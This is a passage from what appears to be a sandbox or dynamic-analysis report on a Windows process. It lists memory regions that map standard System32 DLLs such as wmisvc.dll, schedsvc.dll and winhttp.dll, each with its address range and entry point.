"c:\\windows\\system32\\netprofm.dll") Region: id = 2402 start_va = 0x7ffc4e070000 end_va = 0x7ffc4e08efff monitored = 0 entry_point = 0x7ffc4e0737e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 2403 start_va = 0x7ffc4e090000 end_va = 0x7ffc4e108fff monitored = 0 entry_point = 0x7ffc4e0976a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 2404 start_va = 0x7ffc4e2f0000 end_va = 0x7ffc4e305fff monitored = 0 entry_point = 0x7ffc4e2f1d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 2405 start_va = 0x7ffc4e310000 end_va = 0x7ffc4e327fff monitored = 0 entry_point = 0x7ffc4e314e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 2406 start_va = 0x7ffc4e330000 end_va = 0x7ffc4e354fff monitored = 0 entry_point = 0x7ffc4e335ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 2407 start_va = 0x7ffc4e3c0000 end_va = 0x7ffc4e400fff monitored = 0 entry_point = 0x7ffc4e3c3750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 2408 start_va = 0x7ffc4e410000 end_va = 0x7ffc4e502fff monitored = 0 entry_point = 0x7ffc4e435d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2409 start_va = 0x7ffc4e510000 end_va = 0x7ffc4e527fff monitored = 0 entry_point = 0x7ffc4e512000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 2410 start_va = 0x7ffc4e530000 end_va = 0x7ffc4e6b1fff monitored = 0 entry_point = 0x7ffc4e5482a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 2411 start_va = 0x7ffc4eca0000 end_va = 0x7ffc4ed42fff monitored = 0 entry_point = 0x7ffc4eca2c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 2412 start_va = 0x7ffc4ed50000 end_va = 0x7ffc4eda1fff monitored = 0 entry_point = 0x7ffc4ed55770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 2413 start_va = 0x7ffc4edb0000 end_va = 0x7ffc4edddfff monitored = 1 entry_point = 0x7ffc4edb2300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 2414 start_va = 0x7ffc4ede0000 end_va = 0x7ffc4ee3dfff monitored = 0 entry_point = 0x7ffc4ede5080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 2415 start_va = 0x7ffc4ee40000 end_va = 0x7ffc4ee5ffff monitored = 0 entry_point = 0x7ffc4ee41f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 2416 start_va = 0x7ffc4ee60000 end_va = 0x7ffc4ee68fff monitored = 0 entry_point = 0x7ffc4ee618f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 2417 start_va = 0x7ffc4ee70000 end_va = 0x7ffc4ee80fff monitored = 0 entry_point = 0x7ffc4ee71d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 2418 start_va = 0x7ffc4ee90000 end_va = 0x7ffc4ef0efff monitored = 0 entry_point = 0x7ffc4eea7110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2419 start_va = 0x7ffc4ef10000 end_va = 0x7ffc4ef4bfff monitored = 0 entry_point = 0x7ffc4ef16aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 2420 start_va = 0x7ffc4f0d0000 end_va = 0x7ffc4f11bfff monitored = 0 entry_point = 0x7ffc4f0e5310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 2421 start_va = 0x7ffc4f220000 end_va = 0x7ffc4f22bfff monitored = 0 entry_point = 0x7ffc4f2235c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2422 start_va = 0x7ffc505f0000 end_va = 0x7ffc505f8fff monitored = 0 entry_point = 0x7ffc505f21d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 2423 start_va = 0x7ffc50660000 end_va = 0x7ffc50694fff monitored = 0 entry_point = 0x7ffc5066a270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 2424 start_va = 0x7ffc51300000 end_va = 0x7ffc51309fff monitored = 0 entry_point = 0x7ffc51301350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2425 start_va = 0x7ffc516a0000 end_va = 0x7ffc516b1fff monitored = 0 entry_point = 0x7ffc516a3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 2426 start_va = 0x7ffc517d0000 end_va = 0x7ffc517e5fff monitored = 0 entry_point = 0x7ffc517db550 region_type = mapped_file name = "clipc.dll" filename = "\\Windows\\System32\\Clipc.dll" (normalized: "c:\\windows\\system32\\clipc.dll") Region: id = 2427 start_va = 0x7ffc538e0000 end_va = 0x7ffc538e9fff monitored = 0 entry_point = 0x7ffc538e14c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2428 start_va = 0x7ffc53d70000 end_va = 0x7ffc53d7ffff monitored = 0 entry_point = 0x7ffc53d71700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 2429 start_va = 0x7ffc53d80000 end_va = 0x7ffc53d88fff monitored = 0 entry_point = 0x7ffc53d81ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 2430 start_va = 0x7ffc53d90000 end_va = 0x7ffc53dbcfff monitored = 0 entry_point = 0x7ffc53d92290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 2431 start_va = 0x7ffc53dc0000 end_va = 0x7ffc53e11fff monitored = 0 entry_point = 0x7ffc53dc38e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 2432 start_va = 0x7ffc54080000 end_va = 0x7ffc540fffff monitored = 0 entry_point = 0x7ffc540ad280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 2433 start_va = 0x7ffc54160000 end_va = 0x7ffc54174fff monitored = 0 entry_point = 0x7ffc54162dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 2434 start_va = 0x7ffc541c0000 end_va = 0x7ffc541cdfff monitored = 0 entry_point = 0x7ffc541c1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 2435 start_va = 0x7ffc541d0000 end_va = 0x7ffc541eafff monitored = 0 entry_point = 0x7ffc541d1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2436 start_va = 0x7ffc54510000 end_va = 0x7ffc545a9fff monitored = 0 entry_point = 0x7ffc5452ada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 2437 start_va = 0x7ffc54680000 end_va = 0x7ffc546e6fff monitored = 0 entry_point = 0x7ffc546863e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2438 start_va = 0x7ffc54740000 end_va = 0x7ffc54754fff monitored = 0 entry_point = 0x7ffc54743460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 2439 start_va = 0x7ffc54830000 end_va = 0x7ffc548effff monitored = 0 entry_point = 0x7ffc5485fd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 2440 start_va = 0x7ffc54960000 end_va = 0x7ffc5496afff monitored = 0 entry_point = 0x7ffc54961de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 2441 start_va = 0x7ffc54b20000 end_va = 0x7ffc54b39fff monitored = 0 entry_point = 0x7ffc54b22430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2442 start_va = 0x7ffc54b40000 end_va = 0x7ffc54b53fff monitored = 0 entry_point = 0x7ffc54b42d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 2443 start_va = 0x7ffc54ed0000 end_va = 0x7ffc54f62fff monitored = 0 entry_point = 0x7ffc54ed9680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 2444 start_va = 0x7ffc55190000 end_va = 0x7ffc551a5fff monitored = 0 entry_point = 0x7ffc551919f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2445 start_va = 0x7ffc55360000 end_va = 0x7ffc55378fff monitored = 0 entry_point = 0x7ffc55364520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 2446 start_va = 0x7ffc55820000 end_va = 0x7ffc55857fff monitored = 0 entry_point = 0x7ffc55838cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2447 start_va = 0x7ffc55860000 end_va = 0x7ffc5586afff monitored = 0 entry_point = 0x7ffc55861d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2448 start_va = 0x7ffc55c60000 end_va = 0x7ffc55fe1fff monitored = 0 entry_point = 0x7ffc55cb1220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 2449 start_va = 0x7ffc570e0000 end_va = 0x7ffc571edfff monitored = 0 entry_point = 0x7ffc5712eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 2450 start_va = 0x7ffc574f0000 end_va = 0x7ffc57506fff monitored = 0 entry_point = 0x7ffc574f5630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 2451 start_va = 0x7ffc57570000 end_va = 0x7ffc57582fff monitored = 0 entry_point = 0x7ffc575757f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 2452 start_va = 0x7ffc57590000 end_va = 0x7ffc57609fff monitored = 0 entry_point = 0x7ffc575b7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 2453 start_va = 0x7ffc57620000 end_va = 0x7ffc5764dfff monitored = 0 entry_point = 0x7ffc57627550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 2454 start_va = 0x7ffc57650000 end_va = 0x7ffc57665fff monitored = 0 entry_point = 0x7ffc57651b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2455 start_va = 0x7ffc57670000 end_va = 0x7ffc576d3fff monitored = 0 entry_point = 0x7ffc57685ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2456 start_va = 0x7ffc578a0000 end_va = 0x7ffc5794dfff monitored = 0 entry_point = 0x7ffc578b80c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 2457 start_va = 0x7ffc57950000 end_va = 0x7ffc57961fff monitored = 0 entry_point = 0x7ffc57959260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 2458 start_va = 0x7ffc57970000 end_va = 0x7ffc57a20fff monitored = 0 entry_point = 0x7ffc579e88b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 2459 start_va = 0x7ffc57a30000 end_va = 0x7ffc57a54fff monitored = 0 entry_point = 0x7ffc57a42f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 2460 start_va = 0x7ffc57a60000 end_va = 0x7ffc57a70fff monitored = 0 entry_point = 0x7ffc57a67ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 2461 start_va = 0x7ffc57a80000 end_va = 0x7ffc57a99fff monitored = 0 entry_point = 0x7ffc57a82cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 2462 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57af4fff monitored = 0 entry_point = 0x7ffc57aa3fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 2463 start_va = 0x7ffc57b00000 end_va = 0x7ffc57b36fff monitored = 0 entry_point = 0x7ffc57b06020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 2464 start_va = 0x7ffc57b40000 end_va = 0x7ffc57b5ffff monitored = 0 entry_point = 0x7ffc57b439a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 2465 start_va = 0x7ffc57b60000 end_va = 0x7ffc57ba0fff monitored = 0 entry_point = 0x7ffc57b64840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 2466 start_va = 0x7ffc57bb0000 end_va = 0x7ffc57ce5fff monitored = 0 entry_point = 0x7ffc57bdf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 2467 start_va = 0x7ffc57cf0000 end_va = 0x7ffc57dd5fff monitored = 0 entry_point = 0x7ffc57d0cf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 2468 start_va = 0x7ffc57de0000 end_va = 0x7ffc57debfff monitored = 0 entry_point = 0x7ffc57de14d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 2469 start_va = 0x7ffc57df0000 end_va = 0x7ffc57dfbfff monitored = 0 entry_point = 0x7ffc57df2830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 2470 start_va = 0x7ffc57e00000 end_va = 0x7ffc57e3dfff monitored = 0 entry_point = 0x7ffc57e0a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 2471 start_va = 0x7ffc57e40000 end_va = 0x7ffc57e66fff monitored = 0 entry_point = 0x7ffc57e43bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 2472 start_va = 0x7ffc57e70000 end_va = 0x7ffc57f37fff monitored = 0 entry_point = 0x7ffc57eb13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2473 start_va = 0x7ffc57f40000 end_va = 0x7ffc57fa0fff monitored = 0 entry_point = 0x7ffc57f44b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 2474 start_va = 0x7ffc57fb0000 end_va = 0x7ffc5812bfff monitored = 0 entry_point = 0x7ffc58001650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 2475 start_va = 0x7ffc58130000 end_va = 0x7ffc5813afff monitored = 0 entry_point = 0x7ffc58131770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 2476 start_va = 0x7ffc58140000 end_va = 0x7ffc58194fff monitored = 0 entry_point = 0x7ffc5814fc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 2477 start_va = 0x7ffc581a0000 end_va = 0x7ffc581e9fff monitored = 0 entry_point = 0x7ffc581aac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 2478 start_va = 0x7ffc58230000 end_va = 0x7ffc582c1fff monitored = 0 entry_point = 0x7ffc5827a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 2479 start_va = 0x7ffc58350000 end_va = 0x7ffc5835cfff monitored = 0 entry_point = 0x7ffc58352ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 2480 start_va = 0x7ffc58b50000 end_va = 0x7ffc58b7efff monitored = 0 entry_point = 0x7ffc58b58910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 2481 start_va = 0x7ffc58b80000 end_va = 0x7ffc58b8ffff monitored = 0 entry_point = 0x7ffc58b82c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 2482 start_va = 0x7ffc58c20000 end_va = 0x7ffc58c55fff monitored = 0 entry_point = 0x7ffc58c30070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2483 start_va = 0x7ffc58c80000 end_va = 0x7ffc58c9efff monitored = 0 entry_point = 0x7ffc58c84960 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 2484 start_va = 0x7ffc58cd0000 end_va = 0x7ffc58d3dfff monitored = 0 entry_point = 0x7ffc58cd7f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 2485 start_va = 0x7ffc58d40000 end_va = 0x7ffc58d50fff monitored = 0 entry_point = 0x7ffc58d43320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 2486 start_va = 0x7ffc58d60000 end_va = 0x7ffc58da0fff monitored = 0 entry_point = 0x7ffc58d77eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 2487 start_va = 0x7ffc58db0000 end_va = 0x7ffc58eabfff monitored = 0 entry_point = 0x7ffc58de6df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 2488 start_va = 0x7ffc58eb0000 end_va = 0x7ffc58f6efff monitored = 0 entry_point = 0x7ffc58ed1c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 2489 start_va = 0x7ffc58fc0000 end_va = 0x7ffc58fc9fff monitored = 0 entry_point = 0x7ffc58fc1660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 2490 start_va = 0x7ffc58fd0000 end_va = 0x7ffc58fe7fff monitored = 0 entry_point = 0x7ffc58fd5910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2491 start_va = 0x7ffc58ff0000 end_va = 0x7ffc5913cfff monitored = 0 entry_point = 0x7ffc59033da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 2492 start_va = 0x7ffc59500000 end_va = 0x7ffc59992fff monitored = 0 entry_point = 0x7ffc5950f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2493 start_va = 0x7ffc599a0000 end_va = 0x7ffc59a06fff monitored = 0 entry_point = 0x7ffc599be710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 2494 start_va = 0x7ffc5a2c0000 end_va = 0x7ffc5a2d2fff monitored = 0 entry_point = 0x7ffc5a2c2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2495 start_va = 0x7ffc5a2e0000 end_va = 0x7ffc5a358fff monitored = 0 entry_point = 0x7ffc5a2ffb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 2496 start_va = 0x7ffc5a360000 end_va = 0x7ffc5a367fff monitored = 0 entry_point = 0x7ffc5a3613e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 2497 start_va = 0x7ffc5a3a0000 end_va = 0x7ffc5a525fff monitored = 0 entry_point = 0x7ffc5a3ed700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2498 start_va = 0x7ffc5a530000 end_va = 0x7ffc5a54bfff monitored = 0 entry_point = 0x7ffc5a5337a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 2499 start_va = 0x7ffc5a690000 end_va = 0x7ffc5a6a6fff monitored = 0 entry_point = 0x7ffc5a696620 region_type = mapped_file name = "msauserext.dll" filename = "\\Windows\\System32\\msauserext.dll" (normalized: "c:\\windows\\system32\\msauserext.dll") Region: id = 2500 start_va = 0x7ffc5a6e0000 end_va = 0x7ffc5a71ffff monitored = 0 entry_point = 0x7ffc5a6f1960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 2501 start_va = 0x7ffc5a850000 end_va = 0x7ffc5a876fff monitored = 0 entry_point = 0x7ffc5a857940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2502 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2503 start_va = 0x7ffc5a950000 end_va = 0x7ffc5aa4ffff monitored = 0 entry_point = 0x7ffc5a990f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 2504 start_va = 0x7ffc5aae0000 end_va = 0x7ffc5aaebfff monitored = 0 entry_point = 0x7ffc5aae2480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 2505 start_va = 0x7ffc5abb0000 end_va = 0x7ffc5abe1fff monitored = 0 entry_point = 0x7ffc5abc2340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 2506 start_va = 0x7ffc5ae20000 end_va = 0x7ffc5ae2bfff monitored = 0 entry_point = 0x7ffc5ae22790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 2507 start_va = 0x7ffc5ae30000 end_va = 0x7ffc5ae53fff monitored = 0 entry_point = 0x7ffc5ae33260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2508 start_va = 0x7ffc5afd0000 end_va = 0x7ffc5b0c3fff monitored = 0 entry_point = 0x7ffc5afda960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 2509 start_va = 0x7ffc5b120000 end_va = 0x7ffc5b168fff monitored = 0 entry_point = 0x7ffc5b12a090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: 